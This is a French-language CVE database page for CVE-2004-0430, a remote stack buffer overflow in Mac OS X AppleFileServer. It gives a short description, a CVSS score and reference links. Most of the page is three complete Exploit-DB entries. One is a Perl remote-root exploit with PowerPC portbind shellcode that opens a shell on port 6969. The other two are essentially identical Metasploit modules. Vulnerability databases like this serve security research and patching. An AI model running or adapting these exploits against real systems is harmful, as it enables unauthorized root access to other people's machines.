CVE-2004-0430 : Détail

CVE-2004-0430

80.15%V4
Network
2004-05-06
02h00 +00:00
2017-07-10
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in AppleFileServer for Mac OS X 10.3.3 and earlier allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 391

Date de publication : 2004-08-12 22h00 +00:00
Auteur : Dino Dai Zovi
EDB Vérifié : Yes

#!/usr/bin/perl # Priv8security com remote root exploit for AppleFileServer. # PUBLIC VERSION!!!! # # Bug found by Dave G. and Dino Dai Zovi. # URL: http://www.atstake.com/research/advisories/2004/a050304-1.txt # # [wsxz@localhost buffer]$ perl priv8afp.pl -h 10.4.12.199 -t 0 # -=[Priv8security.com Apple File Server remote root exploit!]=- # # [+] Using target: MacOSX 10.3.3 # [+] Using ret: 0xf0101cb0 # [+] Sending Request Opensession... DOne! # [+] Got response packet: # Flags: 1 Cmd: 4 ID: 31337 # [+] Sending FPloginEXT packet... DOne! # [+] Waiting... We got in =) # # ****** Welcome to 'Adriano-Limas-Computer' ****** # # Darwin Adriano-Limas-Computer.local 7.3.1 Darwin Kernel Version 7.3.1: Mon Mar # 22 21:48:41 PST 2004; root:xnu/xnu-517.4.12.obj~2/RELEASE_PPC Power Macintosh powerpc # uid=0(root) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty), # 5(operator), 20(staff), 31(guest), 80(admin) # #################################################################### use IO::Socket; use Getopt::Std; getopts('h:t:p:o:', \%args); if (defined($args{'h'})) { $host = $args{'h'}; } if (defined($args{'t'})) { $target = $args{'t'}; } if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;} if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;} my @targets = ( # description, ret, Magic size. ["MacOSX 10.3.3", 0xf0101cb0, 4], #tested on my ibook g4 ); print STDERR "-=[Priv8security.com Apple File Server remote root exploit!]=-\n\n"; if (!defined($host) || !defined($target)) { Usage(); } ($desc,$ret,$msize) = @{$targets[$target]}; print STDERR "[+] Using target: $desc\n"; print STDERR "[+] Using ret: 0x" . sprintf('%lx', $ret + $offset) . "\n"; $shellcode = # portbind shellcode by br00t [at] blueyonder.co.uk "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x70". "\x39\x80\x01\x70\x3b\xdf\xff\x88\x7c\xbe\x29\xae\x3b\xdf\xff\x89". "\x7c\xbe\x29\xae\x3b\xdf\xff\x8a\x7c\xbe\x29\xae\x3b\xdf\xff\x8b". "\x7c\xbe\x29\xae\x38\x6c\xfe\x92\x38\x8c\xfe\x91\x38\xac\xfe\x96". "\x38\x0c\xfe\xf1\x44\xff\xff\x02\x60\x60\x60\x60\x7c\x67\x1b\x78". "\x38\x9f\xff\x84\x38\xac\xfe\xa0\x38\x0c\xfe\xf8\x44\xff\xff\x02". "\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x91\x38\x0c\xfe\xfa". "\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x90". "\x38\xac\xfe\x90\x38\x0c\xfe\xae\x44\xff\xff\x02\x60\x60\x60\x60". "\x38\x8c\xfe\x90\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60". "\x38\x8c\xfe\x91\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60". "\x38\x8c\xfe\x92\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60". "\x38\x0c\xfe\x92\x44\xff\xff\x02\x60\x60\x60\x60\x39\x1f\xff\x83". "\x7c\xa8\x29\xae\x38\x7f\xff\x7c\x90\x61\xff\xf8\x90\xa1\xff\xfc". "\x38\x81\xff\xf8\x38\x0c\xfe\xcb\x44\xff\xff\x02\x41\x41\x41\x41". "\x41\x41\x41\x41\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\x02\x1b\x39". "\x41\x41\x41\x41"; $bin_ret = reverse(pack('l', ($ret + $offset))); $buffer = "\x60" x 141; $buffer .= $bin_ret; $buffer .= "\x60" x (824 - length($shellcode)); $buffer .= $shellcode; $buffer .= "A" x 100; $req = "\x00\x04".# Request Opensession "\x7a\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $packet = "\x00". # Request "\x02". # Command "\x7a\x69".# leet ID "\x00\x00\x00\x00".# Data Offset "\x00\x00\x04\x00".# Length "\x00\x00\x00\x00".# Reserved "\x3f". # FPloginext "\x00". # Pad "\x00\x00". # Flags "\x0e\x41\x46\x50\x56\x65\x72\x73\x69\x6f\x6e\x20\x32\x2e\x31".# Version "\x10\x43\x6c\x65\x61\x72\x74\x78\x74\x20\x70\x61\x73\x73\x77\x72\x64". # UAM "\x03". # Type "\x00\x07". # User Len "\x41\x64\x72\x69\x61\x6e\x6f" .# AFPNAME USER "\x03". # Pathtype "\x80\xff". # Path Len $buffer. # Evil String "\x00"; # Pad $len = reverse(pack("S", $msize)); substr($packet, 63 , 2, $len); $f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port) or die "[-] Cant connect: $!\n\n"; print STDERR "[+] Sending Request Opensession... "; $f->send($req); print STDERR "DOne!\n"; $f->recv($crap,128); if($crap){ print STDERR "[+] Got response packet:\n"; parse_packet($crap); } print STDERR "[+] Sending FPloginEXT packet... "; $f->send($packet); print STDERR "DOne!\n"; print STDERR "[+] Waiting... "; sleep(5); $sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>6969,Type=>SOCK_STREAM,Reuse=>1) or die "No luck :( $!\n\n"; print "We got in =)\n"; $sc->autoflush(1); sleep(2); print $sc "echo;echo \"****** Welcome to '`hostname -s`' ******\"\n"; print $sc "echo;uname -a;id;echo\n"; die "cant fork: $!" unless defined($pid = fork()); if ($pid) { while(defined ($line = <$sc>)) { print STDOUT $line; } kill("TERM", $pid); } else { while(defined ($line = <STDIN>)) { print $sc $line; } } close($sc); print "Good bye!!\n"; sub parse_packet { my ($buf) = shift @_; my (@packet); my ($i); for ($i=0;$i<length($buf);$i++) { push(@packet, substr($buf, $i, 1)); } my ($flags) = unpack("C", @packet[0]); my ($cmd) = unpack("C", @packet[1]); my ($request_id) = unpack("n", @packet[2] . @packet[3]); print " Flags: $flags Cmd: $cmd ID: $request_id\n"; } sub Usage { print STDERR "Options: -h Victim ip. -t Target number from list. -p Port to attack. -o Offset, try in steps of 500.\n\n"; print STDERR "Targets:\n"; for($i=0; $i < @targets; $i++){ ($dd) = @{$targets[$i]}; print STDERR " $i - $dd\n"; } print STDERR "\nUsage: perl $0 -h Victim -t target\n\n"; exit; } # milw0rm.com [2004-08-13]
Exploit Database EDB-ID : 16863

Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: loginext.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'AppleFileServer LoginExt PathName Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions. }, 'Author' => 'hdm', 'License' => MSF_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2004-0430'], [ 'OSVDB', '5762'], [ 'BID', '10271'], ], 'Payload' => { 'Space' => 512, 'BadChars' => "\x00\x20", 'MinNops' => 128, 'Compat' => { 'ConnectionType' => "+find" } }, 'Targets' => [ # Target 0 [ 'Mac OS X 10.3.3', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Ret' => 0xf0101c0c # stack address :< }, ], ], 'DisclosureDate' => 'May 3 2004')) # Configure the default port to be AFP register_options( [ Opt::RPORT(548), ], self.class) end def exploit connect print_status("Trying target #{target.name}...") path = "\xff" * 1024 path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret) path[172, payload.encoded.length] = payload.encoded # The AFP header afp = "\x3f\x00\x00\x00" # Add the authentication methods ["AFP3.1", "Cleartxt Passwrd"].each { |m| afp << [m.length].pack('C') + m } # Add the user type and afp path afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9) afp << "\x03" + [path.length].pack('n') + path # Add the data stream interface header dsi = [ 0, # Flags 2, # Command rand(65536), # XID 0, # Data Offset afp.length, # Data Length 0 # Reserved ].pack("CCnNNN") + afp sock.put(dsi) handler disconnect end end
Exploit Database EDB-ID : 9931

Date de publication : 2004-03-02 23h00 +00:00
Auteur : H D Moore
EDB Vérifié : Yes

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'AppleFileServer LoginExt PathName Overflow', 'Description' => %q{ This module exploits a stack overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions. }, 'Author' => 'hdm', 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0430'], [ 'OSVDB', '5762'], [ 'BID', '10271'], ], 'Payload' => { 'Space' => 512, 'BadChars' => "\x00\x20", 'MinNops' => 128, 'Compat' => { 'ConnectionType' => "+find" } }, 'Targets' => [ # Target 0 [ 'Mac OS X 10.3.3', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Ret' => 0xf0101c0c # stack address :< }, ], ], 'DisclosureDate' => 'May 3 2004')) # Configure the default port to be AFP register_options( [ Opt::RPORT(548), ], self.class) end def exploit connect print_status("Trying target #{target.name}...") path = "\xff" * 1024 path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret) path[172, payload.encoded.length] = payload.encoded # The AFP header afp = "\x3f\x00\x00\x00" # Add the authentication methods ["AFP3.1", "Cleartxt Passwrd"].each { |m| afp << [m.length].pack('C') + m } # Add the user type and afp path afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9) afp << "\x03" + [path.length].pack('n') + path # Add the data stream interface header dsi = [ 0, # Flags 2, # Command rand(65536), # XID 0, # Data Offset afp.length, # Data Length 0 # Reserved ].pack("CCnNNN") + afp sock.put(dsi) handler disconnect end end

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (including) 10.3.3

Apple>>Mac_os_x_server >> Version To (including) 10.3.3

Références

http://www.atstake.com/research/advisories/2004/a050304-1.txt
Tags : vendor-advisory, x_refsource_ATSTAKE
http://securitytracker.com/id?1010039
Tags : vdb-entry, x_refsource_SECTRACK
http://www.kb.cert.org/vuls/id/648406
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/11539
Tags : third-party-advisory, x_refsource_SECUNIA